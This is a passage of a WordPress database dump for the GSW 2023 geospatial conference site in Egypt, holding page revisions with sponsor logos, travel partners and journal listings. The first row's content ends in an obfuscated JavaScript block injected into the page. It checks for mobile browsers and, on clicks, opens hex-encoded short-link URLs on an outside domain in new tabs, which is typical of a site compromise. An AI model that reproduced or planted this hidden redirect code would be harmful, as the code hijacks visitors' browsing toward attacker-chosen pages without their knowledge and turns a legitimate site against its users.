_0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-24 04:14:25','2023-08-24 04:14:25','',3066,'https://gsw2023.com/?p=5398',0,'revision','',0),
(5399,1,'2023-08-25 06:33:57','2023-08-25 06:33:57','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px 